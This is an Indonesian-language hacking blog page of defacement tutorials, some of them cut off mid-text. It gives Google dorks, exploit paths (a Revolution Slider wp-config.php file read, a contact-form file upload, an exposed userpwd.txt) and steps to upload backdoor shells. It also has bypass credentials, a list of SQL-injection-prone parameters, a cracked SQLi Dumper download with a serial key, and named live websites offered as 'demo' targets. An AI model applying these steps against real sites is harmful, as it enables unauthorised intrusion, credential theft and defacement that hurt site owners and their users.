Cirebon Cyber Crime

Bahan" : .Dork : allinurl:media.php?module=berita .Exploit : http://www.target.com/admin/content.php?module=banner Langkah-Langkah : 1.copy dork ke google , lalu cari target. 2.lalu berikan exploit pada target .. enter contoh  : http://www.target.com/ menjadi: http://www.target.com/admin/content.php?module=banner 3.Nah nanti akan uncul tambah banner , klik tambah banner itu .. 4.Jangan diapa apakan dulu ye :v , pencet ctrl+u untuk open source nya . lalu copy semua code html nya ke notepad . 5.Didalam Source tersebut ada :   ./aksi.php?module=banner&act=input   Kemudian ganti dengan   http://www.target.com/admin/aksi.php?module=banner&act=input 6.lalu save dengan format .html 7.setelah itu buka file tadi , dan upload shell backdoor anda .. 8.keep sabun :v hehehe .

Bahan" : 1. WHMCS auto exploiter 2. shell Tutorial nya langsung liat video yah biar greget .. https://www.youtube.com/watch?v=EzlF-3daffY

Bahan-Bahan : .Dork : inurl:/com_sexycontactform/ site:id <<--- bisa diganti contoh: .com.br, co.uk , .il ,.net dll             inurl:/components/com_sexycontactform/ black             inurl:/components/com_sexycontactform/ intext:copyright 2015             inurl:/components/com_sexycontactform/ index of             inurl:/components/com_sexycontactform/ intittle: " index of " .eksploit : /components/com_sexycontactform/fileupload/index.php .shell kamu Langkah": 1.masukkan dork ke google lalu cari target .. 2.lalu untuk mengecheck itu vuln atau tidak bisa dengan cara memasukkan exploit dibelakang url target contoh: www.local.com/components/com_sexycontactform/fileupload/index.php lalu enter .. 3.kalo ada tulisan file [] atau semacam nya bla bla itu VULn bisa dideface .. 4.kalo error / not found atau kemb...

ListElement.asp?segid= detail?date= offer_detail.php?oid= item.php?it_id= include_pictures.php?id= recommend.php?item_id= index.php?controller= index.php&limite= pressrelease.php?viewpr= project.asp?id= browse.php?sort= View-Poetry.php?book_id= contacts.php?ofc= reservations.asp?heure= guitartab.asp?idMusica= showthread.php?t= ocasion.php&limite= browse.php?sort= details.asp?ID= view.php?client= comment.php?postid= detailtrip.php?trip_id= video.php?video= mapinfo.asp?map= contorno.php?&offset= street.php?region= vr_viewer.asp?vr_iid= ficha.php?producto= index.php?uid= Listing.SendToCell.asp?Lid= detailnews.php?id= article.php?id= message.php?act= direct_product.php?ID= index.php?id= detalle.php?id= troubleshooting.php?trouble_no= links.asp?gotolink= kom_award.php?page= icons.php?start= group_posts.php?gid= index.php?page= listing.php?listing_id= resultado.php?c= ListInfo.asp?UserID= g...

Langsung gan .. sedot ajah disini http://www.mediafire.com/download/f58zc8j9eicyvwc/Sqli_Dumper_5.1.zip Cara Memakai : 1.Extract semua file yang ada di rar atau zip tersebut di dekstop atau ditempat yang guys suka 2.Setelah di extract click HardDiskSerialNumberChanger.exe 3.Masukan serial numbernya ada di SERIAL HWID.txt 4.Setelah itu restart komputer 5.Sesudah di restart buka file yang tadi cari SQLi Dumper.exe lalu buka 6.Masukan kode B43BC - 761ED - AEB03 - EDD04 7.Selesai Thanks gan semoga bermanfaat :)   Tutorial video : https://www.youtube.com/watch?v=o2PDTEuA4EE&feature=youtu.be

Langsung ajah ya gan .. keperluan : #Adminer: bisa pakai di http://keyrise.com/Adminer.php #Dork: inurl:wp-content/themes/bazar/ #dork yg lain : inurl:/wp-content/themes/theretailer inurl:/wp-content/themes/incrediblewp inurl:/wp-content/themes/revslider inurl:/wp-content/themes/meteor-extras #exploit: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php #AdminLogin: /wp-admin/ #MD5encrypt: http://md5encryption.com/ #notepad++ / notepad biasa juga gapapa (kalo gak pusing :v) KETERANGAN : kalo DB_host nya 'LocalHost' berarti susah /gak bisa masuk pakai adminer. (not vuln) tapi kalo vuln / bisa masuk ke adminer , itu DB_HOSTnya biasa nya panjang seperti ini :   DB_HOST', ' zuffahome.db.9391735.hostedresource.com ' ); ( VULN ) Langkah" 1.copy dork ke google cari target 2.lalu beri exploit , contoh: http://localhost.com/ menjadi: http://localhost.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image...

.Dork: Developed and Design by PureSiteJo for design .Admin Login: /admin .bypass admin: user: abd pass: 123 .upload shell: http://site.com/admin/add_dir.php .akses shell: http://site.com/admin/part/namashell.php jos !! -/\- demo : http://acssslp.com/admin/add_dir.php http://osoolco.net/admin/add_dir.php http://bs99housing.com/ar//admin/add_dir.php http://sstfab-jo.com/admin/add_dir.php http://www.cpmcambridge.com/admin/add_dir.php http://www.al-awn.com/admin/add_dir.php http://www.gerrnataforstone.com/admin/login.php http://www.waddahalatiat-law.com/admin/login.php http://hasadco.com/admin/add_dir.php http://greenfieldsjo.com/admin/add_dir.php http://www.alawadico.com/ar//admin/add_dir.php http://alqudwa.net/admin/add_dir.php http://nizarshaheen.com/admin/add_dir.php http://www.ipco.info/admin/add_dir.php http://waddahalatiat-law.com/admin/add_dir.php

.Dork: intext:"Micro Login System v 1.0" .Exploit: /userpwd.txt Tutorial: 1.copy dork ke google , lalu search .... cari target .. 2.lalu masukan exploit nya .. 3.lalu akan muncul username dan password yg belum di hash , 4.kamu hash dulu password nya bisa di http://hashkiller.co.uk/md5-decrypter.aspx 5.lalu masuk ke login admin nya.. 6.joss :v demo site: http://www.bryceskiteam.org/userpwd.txt http://www.licariautobodysupply.com/pricelist/userpwd.txt http://www.showtimeny.com/userpwd.txt http://www.iberconnectionpt.com/userpwd.txt